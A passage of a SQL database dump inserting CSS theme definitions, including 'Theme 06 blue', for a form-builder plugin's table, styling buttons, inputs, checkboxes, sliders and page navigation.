color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 4px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: transparent;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n	border: 1px solid #ABAAAA;\r\n	border-radius: 7px;\r\n	color: #4C4C4C;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 25px;\r\n	width: 28px;\r\n	background: url([SITE_ROOT]/images/06/01.png) no-repeat 0% 50%;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 66px;\r\n	height: 49px;\r\n	background: url([SITE_ROOT]/images/06/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page\r\n{\r\n        width:inherit !important;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/06/next.png) no-repeat right #019993;\r\n 	padding: 0px 36px 0 20px ;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #018580;\r\n\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/next.png) no-repeat right #00C5BD;\r\n}\r\n.previous-page\r\n{\r\n        width:inherit !important;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #959595;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #E8E8E8;\r\n}\r\n.previous-page div.wdform-page-button:before {\r\n	content: " ";\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left;\r\n	height: 19px;\r\n	width: 20px;\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	top: -2px;\r\n	position: relative;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #019993;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #018580;\r\n}\r\n.button-submit:hover {\r\n	background: #00C5BD;\r\n}\r\n.button-reset {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #959595;\r\n	margin-left: 5px;\r\n}\r\n.button-reset:hover {\r\n	background: #E8E8E8;\r\n}\r\n.wdform_page {\r\n	background: #B1EBE9;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #029A95;\r\n	color: #ffffff !important;\r\n	font-size: 16px;\r\n	text-align: left;\r\npadding: 7px 30px 10px;\r\n}\r\n\r\n.wdform_section_break2 p{\r\n	color: #ffffff !important;\r\n	\r\n}\r\n\r\n.wdform_section_break2:after {\r\n	content: " " ;\r\n	position: relative;\r\n	width: 16px;\r\n	height: 13px;\r\n	top: -3px;\r\n	left: 1px;\r\n	box-shadow: 0px 7px 2px #c9c9c9;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\n	margin: 16px 10px 16px 0px;\r\ncolor:#4C4C4C;\r\nfont-size: 16px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 5px;\r\n	height: 27px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ABAAAA;\r\nbackground: transparent;\r\ncolor: #5C5C5C;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="password"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ntextarea {\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #029A95;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #029A95;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #029A95;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #029A95;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/06/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 9px 1px rgb(218, 218, 218) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #4C4C4C;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #4C4C4C;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #029A95;\r\n	margin-right: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #00DAD3;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 20px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-right: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #01B3AD ;\r\n	background: -moz-linear-gradient(left, #01B3AD 0%, #01CDC6 39%, #02DED6 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #01B3AD ), color-stop(39%, #01CDC6 ), color-stop(100%, #02DED6 ));\r\n	background: -webkit-linear-gradient(left, #01B3AD 0%, #01CDC6 39%, #02DED6 100%);\r\n	background: -o-linear-gradient(left, #01B3AD 0%, #01CDC6 39%, #02DED6 100%);\r\n	background: -ms-linear-gradient(left, #01B3AD 0%, #01CDC6 39%, #02DED6 100%);\r\nlinear-gradient(to right, #01B3AD 0%, #01CDC6 39%, #02DED6 100%)\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #029A95;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: left !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #ffffff;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 23px;\r\n	height: 23px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #ABAAAA !important;\r\n}', 0);
INSERT INTO `cyb_formmaker_themes` (`id`, `title`, `css`, `default`) VALUES
(21, 'Theme 06 blue', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #BBDBE7;\r\nborder: 1px solid #25A5DF;\r\nmargin-bottom: 10px;\r\ncolor: #25A5DF;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: transparent !important;\r\n	margin: 7px 0px;\r\nborder:1px solid #ABAAAA !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 4px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: transparent;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n	border: 1px solid #ABAAAA;\r\n	border-radius: 7px;\r\n	color: #4C4C4C;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 25px;\r\n	width: 28px;\r\n	background: url([SITE_ROOT]/images/06/01.png) no-repeat 0% 50%;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 66px;\r\n	height: 49px;\r\n	background: url([SITE_ROOT]/images/06/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\nbackground: url([SITE_ROOT]/images/06/next.png) no-repeat right #0D66B1;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\nborder: 1px solid #107DAF;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\nbackground: url([SITE_ROOT]/images/06/next.png) no-repeat right #25A5DF;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #959595;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #E8E8E8;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #0D66B1;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #107DAF;\r\n}\r\n.button-submit:hover {\r\n	background: #25A5DF;\r\n}\r\n.button-reset {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #959595;\r\n	margin-left: 5px;\r\n}\r\n.button-reset:hover {\r\n	background: #E8E8E8;\r\n}\r\n.wdform_page {\r\n	background: #BBDBE7;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #0D66B1;\r\n	color: #ffffff;\r\n	font-size: 16px;\r\n	text-align: left;\r\npadding: 7px 30px 10px;\r\n}\r\n\r\n.wdform_section_break2:after {\r\n	content: " " ;\r\n	position: relative;\r\n	width: 16px;\r\n	height: 13px;\r\n	top: -3px;\r\n	left: 1px;\r\n	box-shadow: 0px 7px 2px #c9c9c9;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\n	margin: 16px 10px 16px 0px;\r\ncolor:#4C4C4C;\r\n	font-size: 16px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 5px;\r\n	height: 27px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ABAAAA;\r\nbackground: transparent;\r\ncolor: #5C5C5C;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="password"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ntextarea {\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #0176AA ;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #0176AA ;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #0176AA ;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid 